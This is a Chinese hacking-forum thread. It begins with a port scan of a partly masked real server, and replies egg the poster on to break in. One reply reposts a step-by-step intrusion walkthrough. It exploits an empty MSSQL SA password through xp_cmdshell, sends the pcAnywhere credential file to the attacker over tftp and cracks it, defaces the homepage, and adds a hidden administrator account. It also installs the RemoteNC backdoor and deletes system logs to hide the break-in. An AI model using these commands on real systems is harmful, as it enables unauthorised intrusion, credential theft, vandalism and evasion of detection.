|
![]() | 作者: zengtiang [zengtiang]
![]() |
登录 |
探测主机:210.74.*.*服务检测 FTP-> 220 Serv-U FTP Server v4.0 for WinSock ready... 服务检测 POP-> +OK Microsoft Exchange 2000 POP3 server version 6.0.4417.0 (technodi-si.si.com) ready. 检测 Port-> 210.74.*.* 端口 13 [daytime] 开放 ...OK 服务检测 IMAP-> * OK Microsoft Exchange 2000 IMAP4rev1 server version 6.0.4417.0 (technodi-si.si.com) ready. 检测 Port-> 210.74.*.* 端口 21 [ftp] 开放 ...OK 检测 Port-> 210.74.*.* 端口 53 [domain] 开放 ...OK 检测 Port-> 210.74.*.* 端口 110 [pop3] 开放 ...OK 检测 Port-> 210.74.*.* 端口 119 [nntp] 开放 ...OK 检测 Port-> 210.74.*.* 端口 135 [epmap] 开放 ...OK 检测 Port-> 210.74.*.* 端口 1433 [ms-sql-s] 开放 ...OK |
地主 发表时间: 07/03 21:58 |
![]() | 回复: cxcx2008 [cxcx2008] ![]() |
登录 |
黑掉它 如果你真的无聊的话 |
B1层 发表时间: 07/03 22:26 |
![]() | 回复: badboy [badboy] ![]() |
登录 |
拒绝回答,此类问题发现后应该是删。。。 拜托。。查些漏洞资料去看一下先。 |
B2层 发表时间: 07/04 12:42 |
![]() | 回复: vishx [vishx] ![]() |
登录 |
-> 210.74.*.* 端口 21 [ftp] 开放 弱口令 检测 Port-> 210.74.*.* 端口 1433 [ms-sql-s] 开放 SA弱空令 |
B3层 发表时间: 07/04 17:55 |
![]() | 回复: sgpeng [sgpeng] ![]() |
登录 |
看看有没有mssql溢出漏洞,和WebDAV溢出漏洞~~ 估计10有8,9能搞的定! |
B4层 发表时间: 07/04 18:05 |
![]() | 回复: hacker521 [hacker521] ![]() |
登录 |
有SA口令都不黑掉它,你就对不起我 |
B5层 发表时间: 07/05 07:43 |
![]() | 回复: zengtiang [zengtiang] ![]() |
登录 |
不好意思啦 我很菜所以请大家给点具体的入侵方法?? |
B6层 发表时间: 07/05 10:10 |
![]() | 回复: keke [keke1] ![]() |
登录 |
不好意思啦!我是菜菜鸟 |
B7层 发表时间: 07/05 10:26 |
![]() | 回复: zengtiang [zengtiang] ![]() |
登录 |
怎么没人告诉我啊?????? |
B8层 发表时间: 07/05 21:51 |
![]() | 回复: dsh [dsh] ![]() |
登录 |
干掉他不成问题! |
B9层 发表时间: 07/05 21:56 |
![]() | 回复: napolun [napolun] ![]() |
登录 |
唉,自己搜搜多好。 一次对1433端口SA空口令的入侵全过程 (转) 先ping出目标主机的IP地址: 连接IP主机: 211.154.xxx.xx... 发送 56 个字节... 接收到 56 个字节! 历时: 0毫秒 结论: IP主机正在与Internet连接中... 接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 主机信息 主机名:BEWDB01NOK 80(HTTP) 21(FTP Control) 25(SMTP) 443(HTTPS) 1433(MSSQL) 5631(PCAnyWhere) 用户列表 Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 漏洞: /\../readme.txt (HTTP: 200 ) /msadc/msadcs.dll (HTTP: 200 ) /iisadmpwd/achg.htr (HTTP: 200 ) /_AuthChangeUrl (HTTP: 200 ) /?PageServices (HTTP: 200 ) 上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看, 21(FTP Control) 1433(MSSQL) 5631(PCAnyWhere) 只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从 1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户?..:211.154.xxx.xx Username为sa password框空,连接: SQL>Connecting 211.154.xxx.xx SQL>Connected to 211.154.xxx.xx 呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看: SQL>Command: xp_cmdshell "dir c:\" 驱动器 C 中的卷没有卷标。 卷的序列号是 5CBD-664C 卷的序列号是 5CBD-664C c:\ 的目录 c:\ 的目录 01-12-20 08:13p <DIR> 2u2u 01-07-23 08:10p 0 AUTOEXEC.BAT 01-11-28 04:02p 84 biaoti.txt 01-07-23 08:10p 0 CONFIG.SYS 01-11-22 11:49a <DIR> InetPub 01-10-25 11:12a 15,360 kkkk.XLS 01-07-24 12:09p <DIR> MSSQL7 01-12-12 11:00a 134,217,728 pagefile.sys 01-11-30 10:59a <DIR> Program Files 01-09-04 02:43p 136 sp_attach.sql 01-12-20 04:12p <DIR> temp 01-09-27 11:14a <DIR> unzipped 01-12-15 12:09a <DIR> WINNT 13 个文件 134,233,308 字节 54,232,576 字节可用 54,232,576 字节可用 这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看 ………… XX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵…… 默认情况下,pcanywhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码! 且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务: 选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可! 然后再用ms-sql客户端在目标服务器执行如下指令: copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32 tftp -i 本地ip put New Caller.CIF 命令执行成功,这个cif文件已被传到本地tftp目录下了! 此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator 密码为:amsrepair 打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx 选中login information项中的automatically login to host up connection 并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在 g:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件: <html> <head> <title>hacked<title> </head> <body> <center> hacked </center> </body> 保存为:index.htm 修改主页完成。 该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了! 先给系统加个超级用户,用ms-sql来做: net user wing wing /add net localgroup administrators wing /add 从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入: RemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456 系统显示: [Install Service as RunasUser Mode] Connecting 211.154.xxx.xx ..... Done. Transffer File ..... Done. Start Service ..... Done. Now You can 211.154.xxx.xx to Connect, Have a Joy :-) 安装成功 这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了! 接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务: net stop msftpsvc net stop w3svc 删除c:\winnt\sys tem32\logfile下的所有文件。 再将服务恢复: net start msftpsvc net start w3svc OK,一切搞定! |
B10层 发表时间: 07/05 23:03 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号